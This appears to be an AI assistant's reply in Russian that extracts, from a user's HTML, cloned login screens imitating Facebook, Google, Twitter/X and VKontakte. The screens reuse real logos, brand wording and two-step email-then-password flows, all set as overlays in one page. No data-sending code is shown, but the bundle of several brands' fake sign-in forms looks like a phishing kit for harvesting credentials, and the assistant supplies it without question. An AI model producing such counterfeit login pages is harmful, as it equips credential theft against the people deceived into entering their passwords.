Вот коды для четырех страниц социальных сетей, вырезанные из вашего HTML:

1. Facebook (полноэкранная версия)

```html
<!-- Полноэкранная страница Facebook (новая из второго файла) -->
<div class="facebook-fullscreen" id="facebookFullscreen">
    <!-- Баннер iOS -->
    <div class="app-banner">
        <svg width="20" height="20" viewBox="0 0 24 24"><path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm1 11h2.59L12 16.59 8.41 13H11V8h2v5z"/></svg>
        <span>Установите Facebook для iOS — приложение работает быстрее.</span>
    </div>

    <div class="page-container">
        <div class="lang-selector">Русский</div>

        <div class="logo-container">
            <img src="https://upload.wikimedia.org/wikipedia/commons/b/b8/2021_Facebook_icon.svg" alt="FB Logo">
        </div>

        <form class="login-form" id="facebookLoginForm">
            <div class="input-group">
                <input type="text" id="facebookLogin" class="facebook-input" placeholder="Мобильный телефон или эл. адрес" autocomplete="username">
                <div class="facebook-error-msg" id="facebookLoginError">Введите адрес или номер телефона</div>
            </div>
            
            <div class="input-group">
                <input type="password" id="facebookPassword" class="facebook-input" placeholder="Пароль" autocomplete="current-password">
                <div class="facebook-error-msg" id="facebookPasswordError">Введите пароль</div>
            </div>

            <button type="submit" class="facebook-btn-login">Войти</button>
        </form>

        <a href="#" class="facebook-forgot-link">Забыли пароль?</a>

        <div class="create-account-container">
            <a href="#" class="facebook-btn-create">Создать новый аккаунт</a>
        </div>
    </div>

    <footer class="facebook-footer">
        <img src="https://upload.wikimedia.org/wikipedia/commons/7/7b/Meta_Platforms_Inc._logo.svg" alt="Meta" class="facebook-meta-logo">
        <div class="facebook-footer-links">
            Информация <span>·</span> Справка <span>·</span> Ещё
        </div>
    </footer>
</div>
```

2. Google (полноэкранная версия)

```html
<!-- Полноэкранная страница Google -->
<div class="google-fullscreen" id="googleFullscreen">
    <div class="google-auth-container" id="googleStep1">
        <img src="Google.png" alt="Google" class="google-logo">
        <h1 class="google-title">Sign in</h1>
        <p class="google-subtitle">Use your Google Account</p>
        
        <div class="google-input-group">
            <span class="google-input-label">Phone or email</span>
            <input type="text" id="googleEmailInput" class="google-input">
        </div>

        <div class="google-guest-mode">
            Working on someone else's computer? Use Guest mode.<br>
            <a href="#">Learn more about using Guest mode</a>
        </div>

        <div class="google-footer-buttons">
            <button class="google-btn-text" id="googleCreateAccountBtn">Create account</button>
            <button class="google-btn-blue" id="googleNextBtn">Next</button>
        </div>
        
        <div class="google-lang-footer">English</div>
    </div>
    
    <!-- Страница пароля (скрыта по умолчанию) -->
    <div class="google-auth-container" id="googleStep2" style="display:none;">
        <img src="Google.png" alt="Google" class="google-logo">
        
        <div class="google-welcome-container">
            <h1 class="google-title">Welcome!</h1>
        </div>

        <div class="google-input-group">
            <span class="google-input-label">Enter your password</span>
            <input type="password" id="googlePasswordInput" class="google-input">
        </div>
        
        <div class="google-show-pass">
            <input type="checkbox" id="googleShowPassword"> 
            <label for="googleShowPassword">Show password</label>
        </div>

        <div class="google-footer-buttons">
            <button class="google-btn-text" id="googleForgotPasswordBtn">Forgot password?</button>
            <button class="google-btn-blue" id="googleSubmitBtn">Next</button>
        </div>
        
        <div class="google-lang-footer">English</div>
    </div>
    
    <!-- Общий футер для всей страницы -->
    <div class="google-bottom-footer">
        <div class="google-bottom-footer-links">
            <a href="#">Help</a>
            <a href="#">Privacy</a>
            <a href="#">Terms</a>
        </div>
    </div>
</div>
```

3. Twitter/X (модальные окна)

```html
<!-- Twitter/X модальное окно (этап 1: email/username) -->
<div class="modal-overlay modal-dark" id="xModalStep1">
    <div class="modal modal-dark x-modal-step1">
        <button class="close-modal" onclick="closeModal('xModalStep1')">&times;</button>
        <div class="x-logo">
            <svg viewBox="0 0 24 24" aria-hidden="true" style="width: 40px; height: 40px; fill: white;">
                <g><path d="M18.244 2.25h3.308l-7.227 8.26 8.502 11.24H16.17l-5.214-6.817L4.99 21.75H1.68l7.73-8.835L1.254 2.25H8.08l4.713 6.231zm-1.161 17.52h1.833L7.084 4.126H5.117z"></path></g>
            </svg>
        </div>
        <h1 class="x-title">Sign in to X</h1>
        
        <button class="social-login-btn google">
            <svg viewBox="0 0 24 24" width="18" height="18">
                <path fill="#4285F4" d="M22.56 12.25c0-.78-.07-1.53-.2-2.25H12v4.26h5.92c-.26 1.37-1.04 2.53-2.21 3.31v2.77h3.57c2.08-1.92 3.28-4.74 3.28-8.09z"/>
                <path fill="#34A853" d="M12 23c2.97 0 5.46-.98 7.28-2.66l-3.57-2.77c-.98.66-2.23 1.06-3.71 1.06-2.86 0-5.29-1.93-6.16-4.53H2.18v2.84C3.99 20.53 7.7 23 12 23z"/>
                <path fill="#FBBC05" d="M5.84 14.09c-.22-.66-.35-1.36-.35-2.09s.13-1.43.35-2.09V7.07H2.18C1.43 8.55 1 10.22 1 12s.43 3.45 1.18 4.93l2.85-2.22.81-.62z"/>
                <path fill="#EA4335" d="M12 5.38c1.62 0 3.06.56 4.21 1.64l3.15-3.15C17.45 2.09 14.97 1 12 1 7.7 1 3.99 3.47 2.18 7.07l3.66 2.84c.87-2.6 3.3-4.53 6.16-4.53z"/>
            </svg>
            Sign in with Google
        </button>
        
        <button class="social-login-btn apple">
            <svg viewBox="0 0 24 24" width="18" height="18" fill="currentColor">
                <path d="M17.05 20.28c-.98.95-2.05.86-3.08.38-1.09-.5-2.08-.48-3.24 0-1.44.62-2.2.44-3.06-.38C2.79 15.36 3.51 7.79 9.05 7.31c1.35.07 2.29.74 3.08.8 1.18-.24 2.31-.93 3.57-.84 1.51.12 2.65.72 3.4 1.8-3.04 1.87-2.38 5.98.48 7.13-.57 1.5-1.31 2.99-2.54 4.09l.01-.01zM12.03 7.25c-.15-2.23 1.66-4.07 3.74-4.25.29 2.58-2.34 4.5-3.74 4.25z"/>
            </svg>
            Sign in with Apple
        </button>
        
        <div class="or-divider">
            <span>or</span>
        </div>
        
        <form id="xEmailForm">
            <input type="text" class="x-input" placeholder="Phone, email, or username" required>
            <button type="submit" class="x-next-btn">Next</button>
        </form>
        
        <a href="#" class="x-link" style="display: block; text-align: center; margin-bottom: 20px;">Forgot password?</a>
        
        <div class="x-footer">
            Don't have an account? <a href="#">Sign up</a>
        </div>
    </div>
</div>

<!-- Twitter/X модальное окно (этап 2: пароль) -->
<div class="modal-overlay modal-dark" id="xModalStep2">
    <div class="modal modal-dark x-modal-step2">
        <button class="close-modal" onclick="closeModal('xModalStep2')">&times;</button>
        
        <div class="x-logo">
            <svg viewBox="0 0 24 24" aria-hidden="true" style="width: 40px; height: 40px; fill: white;">
                <g><path d="M18.244 2.25h3.308l-7.227 8.26 8.502 11.24H16.17l-5.214-6.817L4.99 21.75H1.68l7.73-8.835L1.254 2.25H8.08l4.713 6.231zm-1.161 17.52h1.833L7.084 4.126H5.117z"></path></g>
            </svg>
        </div>
        
        <h2 class="x-step2-title">Enter your password</h2>
        
        <form id="xPasswordForm">
            <input type="password" class="x-password-input" placeholder="Enter your password" required>
            
            <button type="submit" class="x-login-btn">Sign in</button>
        </form>
        
        <a href="#" class="x-forgot-password">Forgot password?</a>
        
        <div class="x-step2-footer">
            Don't have an account? <a href="#">Sign up</a>
        </div>
    </div>
</div>
```

4. ВКонтакте (модальное окно)

```html
<!-- ВКонтакте модальное окно -->
<div class="modal-overlay" id="vkModal">
    <div class="modal">
        <button class="close-modal" onclick="closeModal('vkModal')">&times;</button>
        <div style="text-align: center;">
            <img src="vkontakte.png" alt="VK" class="vk-logo">
        </div>
        <h1 class="vk-title">Вход ВКонтакте</h1>
        
        <form id="vkLoginForm">
            <label class="vk-label">Телефон или email</label>
            <input type="text" class="vk-input" placeholder="Телефон или email" required>
            
            <label class="vk-label">Пароль</label>
            <input type="password" class="vk-input" placeholder="Пароль" required>
            
            <div class="vk-checkbox">
                <input type="checkbox" id="vkComputer">
                <label for="vkComputer">Чужой компьютер</label>
            </div>
            
            <button type="submit" class="vk-submit-btn">Войти</button>
        </form>
        
        <div class="vk-links">
            <a href="#" class="vk-link">Регистрация</a>
        </div>
        
        <div style="text-align: center; padding-top: 20px; border-top: 1px solid #DCE1E6;">
            <a href="#" class="vk-link" style="font-size: 14px;">Забыли пароль или не можете войти?</a>
        </div>
    </div>
</div>
```

Эти четыре блока кода содержат все HTML-элементы для страниц авторизации социальных сетей (Facebook, Google, Twitter/X и ВКонтакте) с их соответствующими стилями и функционалом.
